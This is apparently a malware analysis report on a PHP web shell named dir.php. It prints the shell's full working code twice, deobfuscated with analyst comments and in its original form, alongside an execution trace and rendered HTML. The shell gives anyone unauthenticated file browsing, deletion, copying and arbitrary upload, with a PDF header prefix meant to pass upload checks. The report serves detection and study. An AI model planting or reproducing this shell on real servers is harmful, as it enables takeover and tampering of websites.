PHP Malware Analysis

dir.php

md5: 8116021dd67e98967085d0f5414010ea


Deobfuscated PHP code

%PDF-1.7

4 0 obj

<?php 
// NOTE(review): the sample begins with "%PDF-1.7" / "4 0 obj" *before* this
// first PHP tag. PHP copies those bytes to the response unchanged (they are
// visible at the top of the generated HTML below) and then executes the code;
// presumably the PDF magic is there so that magic-byte / MIME sniffing on an
// upload filter classifies the file as a PDF — TODO confirm against the
// upload path used to plant it.
//
// Liveness probe: a request carrying "?check" (any value) answers with the
// literal "checked" and stops before any of the file-manager code runs, so
// the body of that response ends in "checked" with nothing else from this
// script. Cheap hunting signature: a .php URL hit with a "check" parameter.
if (isset($_GET['check'])) {
    echo "checked";
    exit;
}
// Drop-directory self-protection: if the current working directory has no
// .htaccess yet, write one that permits access from anywhere ("Allow from all"
// is Apache 2.2 syntax; on 2.4 it only takes effect when mod_access_compat is
// loaded) and disables directory listing ("Options -Indexes"). The "\r\n"
// inside the literal suggests the sample itself uses CRLF line endings. Return
// values of fopen()/fwrite() are never checked. In the recorded trace
// file_exists() returned TRUE, so this branch did not execute there.
if (!file_exists(".htaccess")) {
    $text = "\r\nAllow from all\r\nOptions -Indexes\r\n        ";
    $fp = fopen(".htaccess", "w");
    fwrite($fp, $text);
    fclose($fp);
}
?>


<html><body>
<!-- Static styling only; no script and no external resources. The script
     never emits closing </body></html> tags (nor closes the <i> it opens
     later), so the closing tags in the generated HTML below are presumably
     supplied by the renderer. -->
<style type="text/css">
    body{
        background: #ffffff;
        color: #666666;
        font-family: Verdana;
        font-size: 11px;
    }
    a:link{
        color: #33CC99;
    }
    a:visited{
        color: #269771;
    }
    a:hover{
        text-decoration: none;
        Color: #3399FF;
    }
    table {
        font-size: 11px;
    }
</style>
<?php 
// File-manager body. Nothing in this file checks a password, cookie, source
// address or User-Agent: anyone who can reach the URL gets the full
// capability of the web-server user.
//
// Hide every warning/notice (failed chdir/unlink/rename/copy would otherwise
// be reported) and remove the execution time limit. In the recorded trace
// set_time_limit(0) returned FALSE.
error_reporting(0);
set_time_limit(0);
// The working directory is taken straight from the "dir" query parameter and
// chdir() is called on it with no validation or canonicalisation, so the
// operator can browse any directory the web-server user can read. A chdir()
// failure is silent; the listing then falls back to whatever cwd is.
if (empty($_GET['dir'])) {
    $dir = getcwd();
} else {
    $dir = $_GET['dir'];
}
chdir($dir);
// Base URL for every action link. htmlentities() is applied here only; the
// per-file parameters (file/src/old/rm) appended later are not escaped, and
// the status messages below echo them back raw as well.
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
// Environment fingerprint for the operator: hostname, resolved cwd and the
// server banner. The <i> opened here is never closed by the script.
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd() . "<br>";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
// Upload form: multipart POST back to this script with mode=upload; the
// field name "upload_file" is a usable detection string.
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";
// Dispatcher key for the switch that follows. Absent in the recorded trace
// ($mode = NULL), so only the directory listing ran there.
$mode = $_GET['mode'];
// Action dispatcher. Every path below is attacker-controlled and used as-is;
// the only limit is the filesystem permission of the web-server user, and
// every failure message is the sole feedback because warnings are suppressed.
switch ($mode) {
    // mode=delete&file=PATH: unlink() an arbitrary path.
    case 'delete':
        $file = $_GET['file'];
        if (unlink($file)) {
            echo $file . " deleted successfully.<p>";
        } else {
            echo "Unable to delete " . $file . ".<p>";
        }
        break;
    // mode=copy&src=PATH, then POST dst=PATH: two-step copy. src comes from
    // the query string, dst from the form body; the first request (no dst)
    // just renders the destination form. Arbitrary read of any readable file
    // into any writable location (e.g. a config file copied under the web
    // root to fetch it over HTTP).
    case 'copy':
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Copy'></form>\n";
        } else {
            if (copy($src, $dst)) {
                echo "File copied successfully.<p>\n";
            } else {
                echo "Unable to copy " . $src . ".<p>\n";
            }
        }
        break;
    // mode=move: same two-step shape as copy, backed by rename().
    case 'move':
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Move'></form>\n";
        } else {
            if (rename($src, $dst)) {
                echo "File moved successfully.<p>\n";
            } else {
                echo "Unable to move " . $src . ".<p>\n";
            }
        }
        break;
    // mode=rename&old=PATH, POST new=PATH: identical to move apart from the
    // parameter names. rename() also works on directories, which is what the
    // "Rename directory" link in the listing relies on.
    case 'rename':
        $old = $_GET['old'];
        $new = $_POST['new'];
        if (empty($new)) {
            echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
            echo "New name: <input name = 'new'><br>\n";
            echo "<input type = 'submit' value = 'Rename'></form>\n";
        } else {
            if (rename($old, $new)) {
                echo "File/Directory renamed successfully.<p>\n";
            } else {
                echo "Unable to rename " . $old . ".<p>\n";
            }
        }
        break;
    // mode=rmdir&rm=PATH: rmdir(); only succeeds on an empty directory.
    case 'rmdir':
        $rm = $_GET['rm'];
        if (rmdir($rm)) {
            echo "Directory removed successfully.<p>\n";
        } else {
            echo "Unable to remove " . $rm . ".<p>\n";
        }
        break;
    // mode=upload: the multipart field "upload_file" is stored under its
    // client-supplied basename in the current directory (i.e. the "dir"
    // parameter). No extension, MIME or size filtering, so a .php upload is
    // directly executable wherever the web server serves that directory.
    // The unlink($temp) after a successful move_uploaded_file() targets a
    // temp file that has already been moved away; its failure is hidden by
    // error_reporting(0).
    case 'upload':
        $temp = $_FILES['upload_file']['tmp_name'];
        $file = basename($_FILES['upload_file']['name']);
        if (!empty($file)) {
            if (move_uploaded_file($temp, $file)) {
                echo "File uploaded successfully.<p>\n";
                unlink($temp);
            } else {
                echo "Unable to upload " . $file . ".<p>\n";
            }
        }
        break;
}
// Directory listing: sub-directories first (with an item count that excludes
// "." and ".."), then regular files with their size in KB. Every row carries
// the action links consumed by the dispatcher above. "." and ".." are listed
// as ordinary entries, which is how the operator walks up the tree; names are
// concatenated into unquoted href attributes without escaping.
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir($dir);
foreach ($files as $file) {
    if (is_dir($file)) {
        // NOTE(review): scandir() on an unreadable sub-directory returns
        // false; count(false) is a warning on PHP 7 but a TypeError on PHP 8,
        // which error_reporting(0) does not swallow — presumably the listing
        // aborts there on a modern build. Not exercised in the trace.
        $items = scandir($file);
        $items_num = count($items) - 2;
        echo "<tr><td><a href = " . $current . "/" . $file . ">" . $file . "</a></td>";
        echo "<td>" . $items_num . " Items</td>";
        echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>";
        echo "<td>-</td>";
        echo "<td>-</td>";
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>";
    }
}
foreach ($files as $file) {
    if (is_file($file)) {
        $size = round(filesize($file) / 1024, 2);
        echo "<tr><td>" . $file . "</td>";
        echo "<td>" . $size . " KB</td>";
        echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>";
        echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>";
        echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>";
        // "Remame" (sic) is part of the sample and a convenient string to hunt on.
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>";
    }
}
echo "</table><br>";

Execution traces

data/traces/8116021dd67e98967085d0f5414010ea_trace-1676256188.7634.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:43:34.661254]
1	0	1	0.000248	393512
1	3	0	0.000443	420488	{main}	1		/var/www/html/uploads/dir.php	0	0
2	4	0	0.000462	420488	file_exists	0		/var/www/html/uploads/dir.php	11	1	'.htaccess'
2	4	1	0.000482	420528
2	4	R			TRUE
2	5	0	0.000496	420488	error_reporting	0		/var/www/html/uploads/dir.php	46	1	0
2	5	1	0.000509	420528
2	5	R			22527
2	6	0	0.000522	420488	set_time_limit	0		/var/www/html/uploads/dir.php	47	1	0
2	6	1	0.000536	420552
2	6	R			FALSE
2	7	0	0.000549	420520	getcwd	0		/var/www/html/uploads/dir.php	50	0
2	7	1	0.000562	420568
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/dir.php	50	$dir = '/var/www/html/uploads'
2	8	0	0.000589	420568	chdir	0		/var/www/html/uploads/dir.php	54	1	'/var/www/html/uploads'
2	8	1	0.000604	420656
2	8	R			TRUE
2	9	0	0.000618	420696	htmlentities	0		/var/www/html/uploads/dir.php	55	1	'/uploads/dir.php?dir=/var/www/html/uploads'
2	9	1	0.000633	420888
2	9	R			'/uploads/dir.php?dir=/var/www/html/uploads'
1		A						/var/www/html/uploads/dir.php	55	$current = '/uploads/dir.php?dir=/var/www/html/uploads'
2	10	0	0.000662	420776	getcwd	0		/var/www/html/uploads/dir.php	58	0
2	10	1	0.000674	420824
2	10	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/dir.php	67	$mode = NULL
2	11	0	0.000702	420776	clearstatcache	0		/var/www/html/uploads/dir.php	144	0
2	11	1	0.000714	420776
2	11	R			NULL
2	12	0	0.000727	420776	scandir	0		/var/www/html/uploads/dir.php	147	1	'/var/www/html/uploads'
2	12	1	0.000757	421392
2	12	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/dir.php	147	$files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
2	13	0	0.000793	421360	is_dir	0		/var/www/html/uploads/dir.php	149	1	'.'
2	13	1	0.000808	421408
2	13	R			TRUE
2	14	0	0.000820	421368	scandir	0		/var/www/html/uploads/dir.php	150	1	'.'
2	14	1	0.000842	421984
2	14	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/dir.php	150	$items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/dir.php	151	$items_num = 4
2	15	0	0.000889	421952	is_dir	0		/var/www/html/uploads/dir.php	149	1	'..'
2	15	1	0.000903	421992
2	15	R			TRUE
2	16	0	0.000915	421952	scandir	0		/var/www/html/uploads/dir.php	150	1	'..'
2	16	1	0.000937	422456
2	16	R			[0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/dir.php	150	$items = [0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/dir.php	151	$items_num = 1
2	17	0	0.000977	421840	is_dir	0		/var/www/html/uploads/dir.php	149	1	'.htaccess'
2	17	1	0.000991	421888
2	17	R			FALSE
2	18	0	0.001004	421848	is_dir	0		/var/www/html/uploads/dir.php	149	1	'data'
2	18	1	0.001017	421880
2	18	R			TRUE
2	19	0	0.001030	421840	scandir	0		/var/www/html/uploads/dir.php	150	1	'data'
2	19	1	0.001051	422368
2	19	R			[0 => '.', 1 => '..', 2 => 'trace-1676256188.7634.xt.gz']
1		A						/var/www/html/uploads/dir.php	150	$items = [0 => '.', 1 => '..', 2 => 'trace-1676256188.7634.xt.gz']
1		A						/var/www/html/uploads/dir.php	151	$items_num = 1
2	20	0	0.001094	421864	is_dir	0		/var/www/html/uploads/dir.php	149	1	'dir.php'
2	20	1	0.001107	421904
2	20	R			FALSE
2	21	0	0.001119	421864	is_dir	0		/var/www/html/uploads/dir.php	149	1	'prepend.php'
2	21	1	0.001133	421912
2	21	R			FALSE
2	22	0	0.001145	421872	is_file	0		/var/www/html/uploads/dir.php	161	1	'.'
2	22	1	0.001159	421904
2	22	R			FALSE
2	23	0	0.001171	421864	is_file	0		/var/www/html/uploads/dir.php	161	1	'..'
2	23	1	0.001184	421904
2	23	R			FALSE
2	24	0	0.001196	421864	is_file	0		/var/www/html/uploads/dir.php	161	1	'.htaccess'
2	24	1	0.001210	421912
2	24	R			TRUE
2	25	0	0.001222	421872	filesize	0		/var/www/html/uploads/dir.php	162	1	'.htaccess'
2	25	1	0.001234	421912
2	25	R			64
2	26	0	0.001247	421872	round	0		/var/www/html/uploads/dir.php	162	2	0.0625	2
2	26	1	0.001260	421944
2	26	R			0.06
1		A						/var/www/html/uploads/dir.php	162	$size = 0.06
2	27	0	0.001291	421872	is_file	0		/var/www/html/uploads/dir.php	161	1	'data'
2	27	1	0.001305	421904
2	27	R			FALSE
2	28	0	0.001317	421864	is_file	0		/var/www/html/uploads/dir.php	161	1	'dir.php'
2	28	1	0.001330	421904
2	28	R			TRUE
2	29	0	0.001343	421864	filesize	0		/var/www/html/uploads/dir.php	162	1	'dir.php'
2	29	1	0.001354	421904
2	29	R			5249
2	30	0	0.001366	421864	round	0		/var/www/html/uploads/dir.php	162	2	5.1259765625	2
2	30	1	0.001378	421936
2	30	R			5.13
1		A						/var/www/html/uploads/dir.php	162	$size = 5.13
2	31	0	0.001403	421864	is_file	0		/var/www/html/uploads/dir.php	161	1	'prepend.php'
2	31	1	0.001418	421912
2	31	R			TRUE
2	32	0	0.001430	421872	filesize	0		/var/www/html/uploads/dir.php	162	1	'prepend.php'
2	32	1	0.001442	421912
2	32	R			57
2	33	0	0.001454	421872	round	0		/var/www/html/uploads/dir.php	162	2	0.0556640625	2
2	33	1	0.001466	421944
2	33	R			0.06
1		A						/var/www/html/uploads/dir.php	162	$size = 0.06
1	3	1	0.001492	421872
			0.001519	315776
TRACE END   [2023-02-13 00:43:34.662668]


Generated HTML code

<html><head></head><body>%PDF-1.7

4 0 obj




<style type="text/css">
    body{
        background: #ffffff;
        color: #666666;
        font-family: Verdana;
        font-size: 11px;
    }
    a:link{
        color: #33CC99;
    }
    a:visited{
        color: #269771;
    }
    a:hover{
        text-decoration: none;
        Color: #3399FF;
    }
    table {
        font-size: 11px;
    }
</style>
<i>Server: localhost<br>Current directory: /var/www/html<br>Software: Apache/2.4.52 (Ubuntu)<br><br><form action="/dir.php?dir=/var/www/html&amp;mode=upload" method="POST" enctype="multipart/form-data">
Local file: <input type="file" name="upload_file"><input type="submit" value="Upload"></form><br><pre>
</pre><table width="100%">
<tbody><tr><td><a href="/dir.php?dir=/var/www/html/.">.</a></td><td>3 Items</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=.">Remove directory</a></td><td>-</td><td>-</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=.">Rename directory</a></td></tr><tr><td><a href="/dir.php?dir=/var/www/html/..">..</a></td><td>2 Items</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=..">Remove directory</a></td><td>-</td><td>-</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=..">Rename directory</a></td></tr><tr><td>.htaccess</td><td>0.04 KB</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=delete&amp;file=.htaccess">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=copy&amp;src=.htaccess">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=move&amp;src=.htaccess">Move</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=.htaccess">Remame</a></td></tr><tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=delete&amp;file=beneri.se_malware_analysis">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=copy&amp;src=beneri.se_malware_analysis">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=move&amp;src=beneri.se_malware_analysis">Move</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=beneri.se_malware_analysis">Remame</a></td></tr><tr><td>dir.php</td><td>5.13 KB</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=delete&amp;file=dir.php">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=copy&amp;src=dir.php">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=move&amp;src=dir.php">Move</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=dir.php">Remame</a></td></tr></tbody></table><br></i></body></html>

Original PHP code

%PDF-1.7

4 0 obj

<?php
	// Liveness probe: "?check" answers "checked" (after the leading "%PDF-1.7"
	// bytes emitted outside the PHP tags) and exits before the file manager
	// runs. Presumably the PDF magic exists to pass upload-time MIME sniffing.
	if (isset ($_GET['check'])) {
		echo "checked";
		exit;
	}

    // Writes a permissive .htaccess ("Allow from all" is Apache 2.2 syntax;
    // on 2.4 it needs mod_access_compat) with listing disabled, if none exists.
    // Results of fopen()/fwrite() are unchecked; the trace shows the file
    // already existed, so this did not run there.
    if (!file_exists(".htaccess")) {
        $text = "
Allow from all
Options -Indexes
        ";
        $fp = fopen(".htaccess", "w");
        fwrite($fp, $text);
        fclose($fp);
    }
?>


<html><body>
<!-- Static styling only; no script and no external resources. -->
<style type="text/css">
    body{
        background: #ffffff;
        color: #666666;
        font-family: Verdana;
        font-size: 11px;
    }
    a:link{
        color: #33CC99;
    }
    a:visited{
        color: #269771;
    }
    a:hover{
        text-decoration: none;
        Color: #3399FF;
    }
    table {
        font-size: 11px;
    }
</style>
<?php
// Unauthenticated file manager: no password, cookie or source-address check
// anywhere in the file. Warnings are suppressed and the time limit removed
// (set_time_limit(0) returned FALSE in the recorded trace).
error_reporting (0);
set_time_limit (0);

// "dir" from the query string is passed to chdir() unvalidated: any directory
// readable by the web-server user can be browsed; a failed chdir is silent.
if (empty ($_GET ['dir'])){
    $dir = getcwd ();
} else {
    $dir = $_GET ['dir'];
}
chdir ($dir);
// Base URL for the action links; only this part is HTML-escaped, the
// per-file parameters appended later are not.
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);

// Environment fingerprint for the operator (hostname, cwd, server banner).
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd () . "<br>";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
// Upload form posting back with mode=upload; field name "upload_file".
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";

// Dispatcher key; NULL in the recorded trace, so only the listing ran.
$mode = $_GET ['mode'];
// Action dispatcher; every path is attacker-controlled and used as-is, limited
// only by the web-server user's filesystem permissions.
switch ($mode) {
    // mode=delete&file=PATH: unlink() an arbitrary path.
    case 'delete':
        $file = $_GET ['file'];
        if (unlink($file)) {
            echo $file . " deleted successfully.<p>";
        } else {
            echo "Unable to delete " . $file . ".<p>";
        }
        break;
    // mode=copy&src=PATH then POST dst=PATH: arbitrary read of any readable
    // file into any writable location (first request without dst renders the
    // destination form).
    case 'copy':
        $src = $_GET ['src'];
        $dst = $_POST ['dst'];
        if (empty ($dst)) {
            echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Copy'></form>\n";
        } else {
            if (copy($src, $dst)) {
                echo "File copied successfully.<p>\n";
            } else {
                echo "Unable to copy " . $src . ".<p>\n";
            }
        }
        break;
    // mode=move: same two-step shape as copy, backed by rename().
    case 'move':
        $src = $_GET ['src'];
        $dst = $_POST ['dst'];
        if (empty ($dst)) {
            echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Move'></form>\n";
        } else {
            if (rename($src, $dst)) {
                echo "File moved successfully.<p>\n";
            } else {
                echo "Unable to move " . $src . ".<p>\n";
            }
        }
        break;
    // mode=rename&old=PATH then POST new=PATH: same as move; rename() also
    // covers directories (the "Rename directory" link in the listing).
    case 'rename':
        $old = $_GET ['old'];
        $new = $_POST ['new'];
        if (empty ($new)) {
            echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
            echo "New name: <input name = 'new'><br>\n";
            echo "<input type = 'submit' value = 'Rename'></form>\n";
        } else {
            if (rename($old, $new)) {
                echo "File/Directory renamed successfully.<p>\n";
            } else {
                echo "Unable to rename " . $old . ".<p>\n";
            }
        }
        break;

    // mode=rmdir&rm=PATH: rmdir(); only succeeds on an empty directory.
    case 'rmdir':
        $rm = $_GET ['rm'];
        if (rmdir($rm)) {
            echo "Directory removed successfully.<p>\n";
        } else {
            echo "Unable to remove " . $rm . ".<p>\n";
        }
        break;
    // mode=upload: "upload_file" is stored under its client-supplied basename
    // in the current ("dir") directory with no extension/MIME/size filtering,
    // so a .php upload is directly executable there. The unlink($temp) after
    // a successful move_uploaded_file() targets a file that was already moved;
    // the failure is hidden by error_reporting(0).
    case 'upload':
        $temp = $_FILES['upload_file']['tmp_name'];
        $file = basename($_FILES['upload_file']['name']);
        if (!empty ($file)) {
            if (move_uploaded_file($temp, $file)) {
                echo "File uploaded successfully.<p>\n";
                unlink($temp);
            } else {
                echo "Unable to upload " . $file . ".<p>\n";
            }
        }
        break;
}
// Listing: sub-directories first (item count excludes "." and ".."), then
// regular files with size in KB, each row carrying the action links for the
// dispatcher above. "." and ".." are listed as ordinary entries; names go
// into unquoted href attributes unescaped.
clearstatcache ();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
    if (is_dir ($file)){
        // NOTE(review): scandir() on an unreadable sub-directory returns
        // false; count(false) is a TypeError on PHP 8 that error_reporting(0)
        // does not hide — presumably aborts the listing there. Not in the trace.
        $items = scandir ($file);
        $items_num = count ($items) - 2;
        echo "<tr><td><a href = ".$current . "/" . $file.">".$file."</a></td>";
        echo "<td>".$items_num." Items</td>";
        echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>";
        echo "<td>-</td>";
        echo "<td>-</td>";
        echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>";
    }
}
foreach ($files as $file){
    if (is_file ($file)){
        $size = round (filesize ($file) / 1024, 2);
        echo "<tr><td>".$file."</td>";
        echo "<td>".$size." KB</td>";
        echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>";
        echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>";
        echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>";
        // "Remame" (sic) is part of the sample and a convenient string to hunt on.
        echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>";
    }
}
echo "</table><br>";